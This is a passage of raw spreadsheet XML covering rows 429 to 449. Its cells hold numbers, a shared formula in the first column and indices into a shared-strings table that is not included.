      <c r="AE429" s="14"/>
      <c r="AF429" s="14"/>
    </row>
    <row r="430">
      <c r="A430" s="6">
        <f t="shared" si="1"/>
        <v>0.5712976485</v>
      </c>
      <c r="B430" s="29">
        <v>1.0</v>
      </c>
      <c r="C430" s="29">
        <v>260228.0</v>
      </c>
      <c r="D430" s="14"/>
      <c r="E430" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F430" s="14"/>
      <c r="G430" s="29">
        <v>0.0</v>
      </c>
      <c r="H430" s="29">
        <v>1331.0</v>
      </c>
      <c r="I430" s="29">
        <v>259557.0</v>
      </c>
      <c r="J430" s="15"/>
      <c r="K430" s="29">
        <v>6253.0</v>
      </c>
      <c r="L430" s="15"/>
      <c r="M430" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N430" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O430" s="29">
        <v>3.0</v>
      </c>
      <c r="P430" s="29">
        <v>2.0</v>
      </c>
      <c r="Q430" s="15"/>
      <c r="R430" s="15"/>
      <c r="S430" s="15"/>
      <c r="T430" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U430" s="5"/>
      <c r="V430" s="5"/>
      <c r="W430" s="47"/>
      <c r="X430" s="45"/>
      <c r="Y430" s="45"/>
      <c r="Z430" s="38" t="s">
        <v>2352</v>
      </c>
      <c r="AA430" s="39" t="s">
        <v>2353</v>
      </c>
      <c r="AB430" s="38" t="s">
        <v>2354</v>
      </c>
      <c r="AC430" s="40">
        <v>260138.0</v>
      </c>
      <c r="AD430" s="5"/>
      <c r="AE430" s="14"/>
      <c r="AF430" s="14"/>
    </row>
    <row r="431">
      <c r="A431" s="6">
        <f t="shared" si="1"/>
        <v>0.7553339762</v>
      </c>
      <c r="B431" s="29">
        <v>1.0</v>
      </c>
      <c r="C431" s="14"/>
      <c r="D431" s="14"/>
      <c r="E431" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F431" s="14"/>
      <c r="G431" s="29">
        <v>2.0</v>
      </c>
      <c r="H431" s="29">
        <v>599.0</v>
      </c>
      <c r="I431" s="29">
        <v>147237.0</v>
      </c>
      <c r="J431" s="15"/>
      <c r="K431" s="29">
        <v>147237.0</v>
      </c>
      <c r="L431" s="15"/>
      <c r="M431" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N431" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O431" s="29">
        <v>4.0</v>
      </c>
      <c r="P431" s="29">
        <v>5.0</v>
      </c>
      <c r="Q431" s="29">
        <v>0.0</v>
      </c>
      <c r="R431" s="15"/>
      <c r="S431" s="15"/>
      <c r="T431" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U431" s="5"/>
      <c r="V431" s="5"/>
      <c r="W431" s="47"/>
      <c r="X431" s="45"/>
      <c r="Y431" s="45"/>
      <c r="Z431" s="38" t="s">
        <v>2355</v>
      </c>
      <c r="AA431" s="39" t="s">
        <v>2356</v>
      </c>
      <c r="AB431" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC431" s="40">
        <v>158604.0</v>
      </c>
      <c r="AD431" s="5"/>
      <c r="AE431" s="14"/>
      <c r="AF431" s="14"/>
    </row>
    <row r="432">
      <c r="A432" s="6">
        <f t="shared" si="1"/>
        <v>0.1654255682</v>
      </c>
      <c r="B432" s="29">
        <v>1.0</v>
      </c>
      <c r="C432" s="15"/>
      <c r="D432" s="14"/>
      <c r="E432" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F432" s="14"/>
      <c r="G432" s="29">
        <v>1.0</v>
      </c>
      <c r="H432" s="29">
        <v>158.0</v>
      </c>
      <c r="I432" s="29">
        <v>142362.0</v>
      </c>
      <c r="J432" s="15"/>
      <c r="K432" s="29">
        <v>6253.0</v>
      </c>
      <c r="L432" s="15"/>
      <c r="M432" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N432" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O432" s="29">
        <v>0.0</v>
      </c>
      <c r="P432" s="29">
        <v>5.0</v>
      </c>
      <c r="Q432" s="15"/>
      <c r="R432" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S432" s="15"/>
      <c r="T432" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U432" s="5"/>
      <c r="V432" s="5"/>
      <c r="W432" s="47"/>
      <c r="X432" s="45"/>
      <c r="Y432" s="45"/>
      <c r="Z432" s="38" t="s">
        <v>2357</v>
      </c>
      <c r="AA432" s="39" t="s">
        <v>2358</v>
      </c>
      <c r="AB432" s="38" t="s">
        <v>2359</v>
      </c>
      <c r="AC432" s="40">
        <v>154260.0</v>
      </c>
      <c r="AD432" s="5"/>
      <c r="AE432" s="14"/>
      <c r="AF432" s="14"/>
    </row>
    <row r="433">
      <c r="A433" s="6">
        <f t="shared" si="1"/>
        <v>0.9600083633</v>
      </c>
      <c r="B433" s="29">
        <v>1.0</v>
      </c>
      <c r="C433" s="15"/>
      <c r="D433" s="14"/>
      <c r="E433" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F433" s="14"/>
      <c r="G433" s="29">
        <v>0.0</v>
      </c>
      <c r="H433" s="29">
        <v>146.0</v>
      </c>
      <c r="I433" s="29">
        <v>106741.0</v>
      </c>
      <c r="J433" s="15"/>
      <c r="K433" s="29">
        <v>6253.0</v>
      </c>
      <c r="L433" s="14"/>
      <c r="M433" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N433" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O433" s="29">
        <v>2.0</v>
      </c>
      <c r="P433" s="29">
        <v>0.0</v>
      </c>
      <c r="Q433" s="15"/>
      <c r="R433" s="15"/>
      <c r="S433" s="15"/>
      <c r="T433" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U433" s="5"/>
      <c r="V433" s="5"/>
      <c r="W433" s="47"/>
      <c r="X433" s="45"/>
      <c r="Y433" s="45"/>
      <c r="Z433" s="38" t="s">
        <v>2360</v>
      </c>
      <c r="AA433" s="39" t="s">
        <v>2361</v>
      </c>
      <c r="AB433" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC433" s="40">
        <v>267838.0</v>
      </c>
      <c r="AD433" s="5"/>
      <c r="AE433" s="14"/>
      <c r="AF433" s="14"/>
    </row>
    <row r="434">
      <c r="A434" s="6">
        <f t="shared" si="1"/>
        <v>0.04603437472</v>
      </c>
      <c r="B434" s="29">
        <v>1.0</v>
      </c>
      <c r="C434" s="15"/>
      <c r="D434" s="14"/>
      <c r="E434" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F434" s="14"/>
      <c r="G434" s="29">
        <v>2.0</v>
      </c>
      <c r="H434" s="29">
        <v>90.0</v>
      </c>
      <c r="I434" s="29">
        <v>71881.0</v>
      </c>
      <c r="J434" s="15"/>
      <c r="K434" s="15"/>
      <c r="L434" s="15"/>
      <c r="M434" s="14"/>
      <c r="N434" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O434" s="29">
        <v>0.0</v>
      </c>
      <c r="P434" s="29">
        <v>2.0</v>
      </c>
      <c r="Q434" s="15"/>
      <c r="R434" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S434" s="15"/>
      <c r="T434" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U434" s="5"/>
      <c r="V434" s="5"/>
      <c r="W434" s="47"/>
      <c r="X434" s="45"/>
      <c r="Y434" s="45"/>
      <c r="Z434" s="38" t="s">
        <v>2362</v>
      </c>
      <c r="AA434" s="39" t="s">
        <v>2363</v>
      </c>
      <c r="AB434" s="38" t="s">
        <v>2364</v>
      </c>
      <c r="AC434" s="40">
        <v>85375.0</v>
      </c>
      <c r="AD434" s="5"/>
      <c r="AE434" s="14"/>
      <c r="AF434" s="14"/>
    </row>
    <row r="435">
      <c r="A435" s="6">
        <f t="shared" si="1"/>
        <v>0.636149272</v>
      </c>
      <c r="B435" s="29">
        <v>1.0</v>
      </c>
      <c r="C435" s="29">
        <v>6665.0</v>
      </c>
      <c r="D435" s="14"/>
      <c r="E435" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F435" s="14"/>
      <c r="G435" s="29">
        <v>9.0</v>
      </c>
      <c r="H435" s="29">
        <v>547.0</v>
      </c>
      <c r="I435" s="29">
        <v>4502.0</v>
      </c>
      <c r="J435" s="15"/>
      <c r="K435" s="29">
        <v>4502.0</v>
      </c>
      <c r="L435" s="15"/>
      <c r="M435" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N435" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O435" s="29">
        <v>5.0</v>
      </c>
      <c r="P435" s="29">
        <v>3.0</v>
      </c>
      <c r="Q435" s="15"/>
      <c r="R435" s="15"/>
      <c r="S435" s="15"/>
      <c r="T435" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U435" s="5"/>
      <c r="V435" s="5"/>
      <c r="W435" s="47"/>
      <c r="X435" s="45"/>
      <c r="Y435" s="45"/>
      <c r="Z435" s="38" t="s">
        <v>2365</v>
      </c>
      <c r="AA435" s="39" t="s">
        <v>2366</v>
      </c>
      <c r="AB435" s="38" t="s">
        <v>2367</v>
      </c>
      <c r="AC435" s="40">
        <v>6659.0</v>
      </c>
      <c r="AD435" s="5"/>
      <c r="AE435" s="14"/>
      <c r="AF435" s="14"/>
    </row>
    <row r="436">
      <c r="A436" s="6">
        <f t="shared" si="1"/>
        <v>0.9922395303</v>
      </c>
      <c r="B436" s="29">
        <v>1.0</v>
      </c>
      <c r="C436" s="14"/>
      <c r="D436" s="14"/>
      <c r="E436" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F436" s="14"/>
      <c r="G436" s="29">
        <v>5.0</v>
      </c>
      <c r="H436" s="29">
        <v>423.0</v>
      </c>
      <c r="I436" s="29">
        <v>238076.0</v>
      </c>
      <c r="J436" s="15"/>
      <c r="K436" s="29">
        <v>6253.0</v>
      </c>
      <c r="L436" s="15"/>
      <c r="M436" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N436" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O436" s="29">
        <v>3.0</v>
      </c>
      <c r="P436" s="29">
        <v>3.0</v>
      </c>
      <c r="Q436" s="15"/>
      <c r="R436" s="15"/>
      <c r="S436" s="15"/>
      <c r="T436" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U436" s="5"/>
      <c r="V436" s="5"/>
      <c r="W436" s="47"/>
      <c r="X436" s="45"/>
      <c r="Y436" s="45"/>
      <c r="Z436" s="38" t="s">
        <v>2368</v>
      </c>
      <c r="AA436" s="39" t="s">
        <v>2369</v>
      </c>
      <c r="AB436" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC436" s="40">
        <v>234393.0</v>
      </c>
      <c r="AD436" s="5"/>
      <c r="AE436" s="14"/>
      <c r="AF436" s="14"/>
    </row>
    <row r="437">
      <c r="A437" s="6">
        <f t="shared" si="1"/>
        <v>0.6656268775</v>
      </c>
      <c r="B437" s="29">
        <v>1.0</v>
      </c>
      <c r="C437" s="29">
        <v>266776.0</v>
      </c>
      <c r="D437" s="14"/>
      <c r="E437" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F437" s="14"/>
      <c r="G437" s="29">
        <v>1.0</v>
      </c>
      <c r="H437" s="29">
        <v>100.0</v>
      </c>
      <c r="I437" s="29">
        <v>286283.0</v>
      </c>
      <c r="J437" s="15"/>
      <c r="K437" s="15"/>
      <c r="L437" s="15"/>
      <c r="M437" s="15"/>
      <c r="N437" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O437" s="29">
        <v>1.0</v>
      </c>
      <c r="P437" s="29">
        <v>0.0</v>
      </c>
      <c r="Q437" s="15"/>
      <c r="R437" s="15"/>
      <c r="S437" s="15"/>
      <c r="T437" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U437" s="5"/>
      <c r="V437" s="5"/>
      <c r="W437" s="47"/>
      <c r="X437" s="45"/>
      <c r="Y437" s="45"/>
      <c r="Z437" s="38" t="s">
        <v>2370</v>
      </c>
      <c r="AA437" s="39" t="s">
        <v>2371</v>
      </c>
      <c r="AB437" s="38" t="s">
        <v>2372</v>
      </c>
      <c r="AC437" s="40">
        <v>266769.0</v>
      </c>
      <c r="AD437" s="5"/>
      <c r="AE437" s="14"/>
      <c r="AF437" s="14"/>
    </row>
    <row r="438">
      <c r="A438" s="6">
        <f t="shared" si="1"/>
        <v>0.3386514864</v>
      </c>
      <c r="B438" s="29">
        <v>1.0</v>
      </c>
      <c r="C438" s="14"/>
      <c r="D438" s="14"/>
      <c r="E438" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F438" s="14"/>
      <c r="G438" s="29">
        <v>-2.0</v>
      </c>
      <c r="H438" s="29">
        <v>131.0</v>
      </c>
      <c r="I438" s="29">
        <v>91568.0</v>
      </c>
      <c r="J438" s="15"/>
      <c r="K438" s="29">
        <v>91568.0</v>
      </c>
      <c r="L438" s="15"/>
      <c r="M438" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N438" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O438" s="29">
        <v>1.0</v>
      </c>
      <c r="P438" s="29">
        <v>18.0</v>
      </c>
      <c r="Q438" s="15"/>
      <c r="R438" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S438" s="15"/>
      <c r="T438" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U438" s="5"/>
      <c r="V438" s="5"/>
      <c r="W438" s="47"/>
      <c r="X438" s="45"/>
      <c r="Y438" s="45"/>
      <c r="Z438" s="38" t="s">
        <v>2373</v>
      </c>
      <c r="AA438" s="39" t="s">
        <v>2374</v>
      </c>
      <c r="AB438" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC438" s="40">
        <v>106346.0</v>
      </c>
      <c r="AD438" s="5"/>
      <c r="AE438" s="14"/>
      <c r="AF438" s="14"/>
    </row>
    <row r="439">
      <c r="A439" s="6">
        <f t="shared" si="1"/>
        <v>0.9627143031</v>
      </c>
      <c r="B439" s="29">
        <v>1.0</v>
      </c>
      <c r="C439" s="15"/>
      <c r="D439" s="14"/>
      <c r="E439" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F439" s="14"/>
      <c r="G439" s="29">
        <v>0.0</v>
      </c>
      <c r="H439" s="29">
        <v>368.0</v>
      </c>
      <c r="I439" s="29">
        <v>47996.0</v>
      </c>
      <c r="J439" s="15"/>
      <c r="K439" s="29">
        <v>11801.0</v>
      </c>
      <c r="L439" s="15"/>
      <c r="M439" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N439" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O439" s="29">
        <v>3.0</v>
      </c>
      <c r="P439" s="29">
        <v>0.0</v>
      </c>
      <c r="Q439" s="15"/>
      <c r="R439" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S439" s="15"/>
      <c r="T439" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U439" s="5"/>
      <c r="V439" s="5"/>
      <c r="W439" s="47"/>
      <c r="X439" s="45"/>
      <c r="Y439" s="45"/>
      <c r="Z439" s="38" t="s">
        <v>2375</v>
      </c>
      <c r="AA439" s="39" t="s">
        <v>2376</v>
      </c>
      <c r="AB439" s="38" t="s">
        <v>2377</v>
      </c>
      <c r="AC439" s="40">
        <v>59594.0</v>
      </c>
      <c r="AD439" s="5"/>
      <c r="AE439" s="14"/>
      <c r="AF439" s="14"/>
    </row>
    <row r="440">
      <c r="A440" s="6">
        <f t="shared" si="1"/>
        <v>0.2076067154</v>
      </c>
      <c r="B440" s="29">
        <v>1.0</v>
      </c>
      <c r="C440" s="29">
        <v>138649.0</v>
      </c>
      <c r="D440" s="14"/>
      <c r="E440" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F440" s="14"/>
      <c r="G440" s="29">
        <v>2.0</v>
      </c>
      <c r="H440" s="29">
        <v>314.0</v>
      </c>
      <c r="I440" s="29">
        <v>36398.0</v>
      </c>
      <c r="J440" s="15"/>
      <c r="K440" s="29">
        <v>36398.0</v>
      </c>
      <c r="L440" s="15"/>
      <c r="M440" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N440" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O440" s="29">
        <v>2.0</v>
      </c>
      <c r="P440" s="29">
        <v>12.0</v>
      </c>
      <c r="Q440" s="15"/>
      <c r="R440" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S440" s="15"/>
      <c r="T440" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U440" s="5"/>
      <c r="V440" s="5"/>
      <c r="W440" s="47"/>
      <c r="X440" s="45"/>
      <c r="Y440" s="45"/>
      <c r="Z440" s="38" t="s">
        <v>2378</v>
      </c>
      <c r="AA440" s="39" t="s">
        <v>2379</v>
      </c>
      <c r="AB440" s="38" t="s">
        <v>1788</v>
      </c>
      <c r="AC440" s="40">
        <v>138576.0</v>
      </c>
      <c r="AD440" s="5"/>
      <c r="AE440" s="14"/>
      <c r="AF440" s="14"/>
    </row>
    <row r="441">
      <c r="A441" s="6">
        <f t="shared" si="1"/>
        <v>0.2346973943</v>
      </c>
      <c r="B441" s="29">
        <v>1.0</v>
      </c>
      <c r="C441" s="29">
        <v>83144.0</v>
      </c>
      <c r="D441" s="14"/>
      <c r="E441" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F441" s="14"/>
      <c r="G441" s="29">
        <v>11.0</v>
      </c>
      <c r="H441" s="29">
        <v>1603.0</v>
      </c>
      <c r="I441" s="29">
        <v>59311.0</v>
      </c>
      <c r="J441" s="15"/>
      <c r="K441" s="15"/>
      <c r="L441" s="15"/>
      <c r="M441" s="14"/>
      <c r="N441" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O441" s="29">
        <v>2.0</v>
      </c>
      <c r="P441" s="29">
        <v>2.0</v>
      </c>
      <c r="Q441" s="15"/>
      <c r="R441" s="15"/>
      <c r="S441" s="15"/>
      <c r="T441" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U441" s="5"/>
      <c r="V441" s="5"/>
      <c r="W441" s="47"/>
      <c r="X441" s="45"/>
      <c r="Y441" s="45"/>
      <c r="Z441" s="38" t="s">
        <v>2380</v>
      </c>
      <c r="AA441" s="39" t="s">
        <v>2381</v>
      </c>
      <c r="AB441" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC441" s="40">
        <v>82854.0</v>
      </c>
      <c r="AD441" s="5"/>
      <c r="AE441" s="14"/>
      <c r="AF441" s="14"/>
    </row>
    <row r="442">
      <c r="A442" s="6">
        <f t="shared" si="1"/>
        <v>0.3838716687</v>
      </c>
      <c r="B442" s="29">
        <v>1.0</v>
      </c>
      <c r="C442" s="29">
        <v>203982.0</v>
      </c>
      <c r="D442" s="14"/>
      <c r="E442" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F442" s="14"/>
      <c r="G442" s="29">
        <v>2.0</v>
      </c>
      <c r="H442" s="29">
        <v>410.0</v>
      </c>
      <c r="I442" s="29">
        <v>717.0</v>
      </c>
      <c r="J442" s="15"/>
      <c r="K442" s="29">
        <v>198418.0</v>
      </c>
      <c r="L442" s="15"/>
      <c r="M442" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N442" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O442" s="29">
        <v>1.0</v>
      </c>
      <c r="P442" s="29">
        <v>0.0</v>
      </c>
      <c r="Q442" s="15"/>
      <c r="R442" s="15"/>
      <c r="S442" s="15"/>
      <c r="T442" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U442" s="5"/>
      <c r="V442" s="5"/>
      <c r="W442" s="47"/>
      <c r="X442" s="45"/>
      <c r="Y442" s="45"/>
      <c r="Z442" s="38" t="s">
        <v>2382</v>
      </c>
      <c r="AA442" s="39" t="s">
        <v>2383</v>
      </c>
      <c r="AB442" s="38" t="s">
        <v>2384</v>
      </c>
      <c r="AC442" s="40">
        <v>203975.0</v>
      </c>
      <c r="AD442" s="5"/>
      <c r="AE442" s="14"/>
      <c r="AF442" s="14"/>
    </row>
    <row r="443">
      <c r="A443" s="6">
        <f t="shared" si="1"/>
        <v>0.2770899431</v>
      </c>
      <c r="B443" s="29">
        <v>1.0</v>
      </c>
      <c r="C443" s="29">
        <v>142693.0</v>
      </c>
      <c r="D443" s="14"/>
      <c r="E443" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F443" s="14"/>
      <c r="G443" s="29">
        <v>1.0</v>
      </c>
      <c r="H443" s="29">
        <v>265.0</v>
      </c>
      <c r="I443" s="15"/>
      <c r="J443" s="5" t="s">
        <v>2385</v>
      </c>
      <c r="K443" s="15"/>
      <c r="L443" s="5" t="s">
        <v>2385</v>
      </c>
      <c r="M443" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N443" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O443" s="29">
        <v>2.0</v>
      </c>
      <c r="P443" s="29">
        <v>2.0</v>
      </c>
      <c r="Q443" s="15"/>
      <c r="R443" s="15"/>
      <c r="S443" s="15"/>
      <c r="T443" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U443" s="5"/>
      <c r="V443" s="5"/>
      <c r="W443" s="45"/>
      <c r="X443" s="45"/>
      <c r="Y443" s="45"/>
      <c r="Z443" s="38" t="s">
        <v>2386</v>
      </c>
      <c r="AA443" s="39" t="s">
        <v>2387</v>
      </c>
      <c r="AB443" s="38" t="s">
        <v>2388</v>
      </c>
      <c r="AC443" s="40">
        <v>142691.0</v>
      </c>
      <c r="AD443" s="5"/>
      <c r="AE443" s="14"/>
      <c r="AF443" s="14"/>
    </row>
    <row r="444">
      <c r="A444" s="6">
        <f t="shared" si="1"/>
        <v>0.006802271931</v>
      </c>
      <c r="B444" s="29">
        <v>1.0</v>
      </c>
      <c r="C444" s="15"/>
      <c r="D444" s="14"/>
      <c r="E444" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F444" s="14"/>
      <c r="G444" s="29">
        <v>0.0</v>
      </c>
      <c r="H444" s="29">
        <v>181.0</v>
      </c>
      <c r="I444" s="29">
        <v>191224.0</v>
      </c>
      <c r="J444" s="15"/>
      <c r="K444" s="15"/>
      <c r="L444" s="15"/>
      <c r="M444" s="15"/>
      <c r="N444" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O444" s="29">
        <v>3.0</v>
      </c>
      <c r="P444" s="29">
        <v>1.0</v>
      </c>
      <c r="Q444" s="15"/>
      <c r="R444" s="15"/>
      <c r="S444" s="15"/>
      <c r="T444" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U444" s="5"/>
      <c r="V444" s="5"/>
      <c r="W444" s="47"/>
      <c r="X444" s="45"/>
      <c r="Y444" s="45"/>
      <c r="Z444" s="38" t="s">
        <v>2389</v>
      </c>
      <c r="AA444" s="39" t="s">
        <v>2390</v>
      </c>
      <c r="AB444" s="38" t="s">
        <v>2391</v>
      </c>
      <c r="AC444" s="40">
        <v>202291.0</v>
      </c>
      <c r="AD444" s="5"/>
      <c r="AE444" s="14"/>
      <c r="AF444" s="14"/>
    </row>
    <row r="445">
      <c r="A445" s="6">
        <f t="shared" si="1"/>
        <v>0.6313090402</v>
      </c>
      <c r="B445" s="29">
        <v>1.0</v>
      </c>
      <c r="C445" s="29">
        <v>144035.0</v>
      </c>
      <c r="D445" s="14"/>
      <c r="E445" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F445" s="14"/>
      <c r="G445" s="29">
        <v>7.0</v>
      </c>
      <c r="H445" s="29">
        <v>5461.0</v>
      </c>
      <c r="I445" s="29">
        <v>31625.0</v>
      </c>
      <c r="J445" s="15"/>
      <c r="K445" s="15"/>
      <c r="L445" s="15"/>
      <c r="M445" s="14"/>
      <c r="N445" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O445" s="29">
        <v>3.0</v>
      </c>
      <c r="P445" s="29">
        <v>0.0</v>
      </c>
      <c r="Q445" s="15"/>
      <c r="R445" s="15"/>
      <c r="S445" s="15"/>
      <c r="T445" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U445" s="5"/>
      <c r="V445" s="5"/>
      <c r="W445" s="47"/>
      <c r="X445" s="45"/>
      <c r="Y445" s="45"/>
      <c r="Z445" s="38" t="s">
        <v>2392</v>
      </c>
      <c r="AA445" s="39" t="s">
        <v>2393</v>
      </c>
      <c r="AB445" s="38" t="s">
        <v>2394</v>
      </c>
      <c r="AC445" s="40">
        <v>76041.0</v>
      </c>
      <c r="AD445" s="5"/>
      <c r="AE445" s="14"/>
      <c r="AF445" s="14"/>
    </row>
    <row r="446">
      <c r="A446" s="6">
        <f t="shared" si="1"/>
        <v>0.811921174</v>
      </c>
      <c r="B446" s="29">
        <v>1.0</v>
      </c>
      <c r="C446" s="29">
        <v>36439.0</v>
      </c>
      <c r="D446" s="14"/>
      <c r="E446" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F446" s="14"/>
      <c r="G446" s="29">
        <v>1.0</v>
      </c>
      <c r="H446" s="29">
        <v>158.0</v>
      </c>
      <c r="I446" s="29">
        <v>13718.0</v>
      </c>
      <c r="J446" s="15"/>
      <c r="K446" s="15"/>
      <c r="L446" s="15"/>
      <c r="M446" s="14"/>
      <c r="N446" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O446" s="29">
        <v>2.0</v>
      </c>
      <c r="P446" s="29">
        <v>1.0</v>
      </c>
      <c r="Q446" s="15"/>
      <c r="R446" s="15"/>
      <c r="S446" s="15"/>
      <c r="T446" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U446" s="5"/>
      <c r="V446" s="5"/>
      <c r="W446" s="47"/>
      <c r="X446" s="45"/>
      <c r="Y446" s="45"/>
      <c r="Z446" s="38" t="s">
        <v>2395</v>
      </c>
      <c r="AA446" s="39" t="s">
        <v>2396</v>
      </c>
      <c r="AB446" s="38" t="s">
        <v>2397</v>
      </c>
      <c r="AC446" s="40">
        <v>36437.0</v>
      </c>
      <c r="AD446" s="5"/>
      <c r="AE446" s="14"/>
      <c r="AF446" s="14"/>
    </row>
    <row r="447">
      <c r="A447" s="6">
        <f t="shared" si="1"/>
        <v>0.7847191041</v>
      </c>
      <c r="B447" s="29">
        <v>1.0</v>
      </c>
      <c r="C447" s="15"/>
      <c r="D447" s="14"/>
      <c r="E447" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F447" s="14"/>
      <c r="G447" s="29">
        <v>1.0</v>
      </c>
      <c r="H447" s="29">
        <v>63.0</v>
      </c>
      <c r="I447" s="29">
        <v>55602.0</v>
      </c>
      <c r="J447" s="15"/>
      <c r="K447" s="29">
        <v>55602.0</v>
      </c>
      <c r="L447" s="15"/>
      <c r="M447" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N447" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O447" s="29">
        <v>0.0</v>
      </c>
      <c r="P447" s="29">
        <v>15.0</v>
      </c>
      <c r="Q447" s="15"/>
      <c r="R447" s="15"/>
      <c r="S447" s="15"/>
      <c r="T447" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U447" s="5"/>
      <c r="V447" s="5"/>
      <c r="W447" s="47"/>
      <c r="X447" s="45"/>
      <c r="Y447" s="45"/>
      <c r="Z447" s="38" t="s">
        <v>2398</v>
      </c>
      <c r="AA447" s="39" t="s">
        <v>2399</v>
      </c>
      <c r="AB447" s="38" t="s">
        <v>2400</v>
      </c>
      <c r="AC447" s="40">
        <v>260121.0</v>
      </c>
      <c r="AD447" s="5"/>
      <c r="AE447" s="14"/>
      <c r="AF447" s="14"/>
    </row>
    <row r="448">
      <c r="A448" s="6">
        <f t="shared" si="1"/>
        <v>0.8793736893</v>
      </c>
      <c r="B448" s="29">
        <v>1.0</v>
      </c>
      <c r="C448" s="29">
        <v>153624.0</v>
      </c>
      <c r="D448" s="14"/>
      <c r="E448" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F448" s="14"/>
      <c r="G448" s="29">
        <v>2.0</v>
      </c>
      <c r="H448" s="29">
        <v>1335.0</v>
      </c>
      <c r="I448" s="29">
        <v>9891.0</v>
      </c>
      <c r="J448" s="15"/>
      <c r="K448" s="15"/>
      <c r="L448" s="15"/>
      <c r="M448" s="14"/>
      <c r="N448" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O448" s="29">
        <v>3.0</v>
      </c>
      <c r="P448" s="29">
        <v>0.0</v>
      </c>
      <c r="Q448" s="15"/>
      <c r="R448" s="15"/>
      <c r="S448" s="15"/>
      <c r="T448" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U448" s="5"/>
      <c r="V448" s="5"/>
      <c r="W448" s="47"/>
      <c r="X448" s="45"/>
      <c r="Y448" s="45"/>
      <c r="Z448" s="38" t="s">
        <v>2401</v>
      </c>
      <c r="AA448" s="39" t="s">
        <v>2402</v>
      </c>
      <c r="AB448" s="38" t="s">
        <v>2403</v>
      </c>
      <c r="AC448" s="40">
        <v>153618.0</v>
      </c>
      <c r="AD448" s="5"/>
      <c r="AE448" s="14"/>
      <c r="AF448" s="14"/>
    </row>
    <row r="449">
      <c r="A449" s="6">
        <f t="shared" si="1"/>
        <v>0.04565553807</v>
      </c>
      <c r="B449" s="29">
        <v>1.0</v>
      </c>
      <c r="C449" s="14"/>
      <c r="D449" s="14"/>
      <c r="E449" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F449" s="14"/>
      <c r="G449" s="29">
        <v>0.0</v>
      </c>
      <c r="H449" s="29">
        <v>151.0</v>
      </c>
      <c r="I449" s="29">
        <v>235060.0</v>
      </c>
      <c r="J449" s="15"/>
      <c r="K449" s="15"/>
      <c r="L449" s="15"/>
      <c r="M449" s="15"/>
      <c r="N449" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O449" s="29">
        <v>1.0</v>
      </c>
      <c r="P449" s="29">
        <v>4.0</v>
      </c>
      <c r="Q449" s="15"/>
